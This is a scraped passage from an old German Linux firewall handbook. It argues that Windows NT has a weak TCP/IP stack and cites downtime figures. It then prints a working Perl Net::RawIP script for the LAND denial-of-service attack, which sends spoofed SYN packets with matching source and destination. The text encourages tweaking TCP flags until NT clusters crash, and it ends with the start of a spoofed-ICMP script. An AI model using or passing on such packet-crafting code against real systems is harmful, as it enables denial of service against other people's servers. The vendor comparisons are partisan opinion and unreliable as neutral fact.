Firewall Handbuch für LINUX 2.0 und 2.2 - zurück
Firewall Handbuch für LINUX 2.0 und 2.2 - zurück
Firewall Handbuch für LINUX 2.0 und 2.2 - zurück
Sie wollen auch ein ePaper? Erhöhen Sie die Reichweite Ihrer Titel.
YUMPU macht aus Druck-PDFs automatisch weboptimierte ePaper, die Google liebt.
Einige Suchmaschinen, wie z.B. Yahoo <strong>und</strong> HOTBOT haben net::rawip zensiert. Die<br />
Suchmaschine http://www.northernlight.com/ liefert jedoch zu diesem Thema einige<br />
h<strong>und</strong>ert Informationen.<br />
Wie durchschlagend diese Angriffe sind, wird daran deutlich, daß Microsoft in den<br />
Beschreibungen der Service Packs diese Problematik erst garnicht dokumentiert, sondern<br />
Patches immer heimlich mitliefert. Falls also gerade Ihr 100.000 DM Windows NT 4.0<br />
Wolfpack - Cluster mit Servicepack 5 in Ihrem Unternehmen ständig ausfällt, dann sollten<br />
Sie vielleicht einmal Arbeitsstationen auf Visual Basic Makro's in Winword Dokumenten<br />
untersuchen, die über die veraltete Winsock 2.1 diese Pakete an den Server versenden.<br />
Diese Beispiele werde ich an dieser Stelle nicht veröffentlichen, da ansonsten der<br />
Schaden unermesslich sein würde. Dieser Abschnitt hier soll auch nur den Ernst der Lage<br />
verdeutlichen <strong>und</strong> keine Aufforderung <strong>für</strong> Mitarbeiter sein, dem eigenen Unternehmen<br />
einen Millionenschaden zuzufügen. Wer Microsoft NT Server in Unternehmen einsetzt, der<br />
hat leider auf das falsche Pferd gesetzt. Microsoft kann bis heut noch keinen vernünftigen<br />
TCP/IP Stack liefern, was auch die riesigen Ausfälle bei Internet-Providern mit NT-Servern<br />
zeigen.<br />
Die Gartner GROUP hat signifikante Unterschieden bei den DOWN-Zeiten zwischen den<br />
großen Plattformen festgestellt, siehe INFORMATIONWEEK 17/18 vom 19. August 1999,<br />
Seite 40:<br />
AS/400 5.2 St<strong>und</strong>en/Jahr<br />
S/390 8.9 St<strong>und</strong>en/Jahr<br />
UNIX 23.6 St<strong>und</strong>en/Jahr<br />
Windows NT 224.5 St<strong>und</strong>en/Jahr<br />
Da weiß man, was man hat ! Schönen, guten Abend (Zitat von Jan Hagemeier, Bonn)<br />
Hier nun einige Beispiele: Der LAND Angriff<br />
#!/usr/bin/perl<br />
require 'getopts.pl';<br />
use Net::RawIP;<br />
Getopts('i:p:');<br />
$a = new Net::RawIP;<br />
die "Usage $0 -i -p " unless<br />
($opt_i && $opt_p);<br />
$a->set({ ip => {saddr => $opt_i,<br />
daddr => $opt_i<br />
},<br />
tcp=> {dest => $opt_p,<br />
source => $opt_p,<br />
psh => 1,<br />
syn => 1}<br />
});<br />
$a->send;<br />
Fertig ! Ja, es ist wirklich so einfach ....Spielen Sie mit den Flags (psh, syn....) herum, <strong>und</strong><br />
sie werden merken, daß bei der richtigen Kombination Windows NT Cluster (Tandem,<br />
Wolfpack) aussteigen....<br />
Ein einfacher PING<br />
#!/usr/bin/perl<br />
use Net::RawIP qw(:pcap);<br />
$a = new Net::RawIP ({icmp =>{}});<br />
$a->set({ip => {saddr => 'www.intra.net', # insert your site<br />
here !<br />
daddr => $ARGV[0]},<br />
Erstellt von Doc Gonzo - http://kickme.to/plugins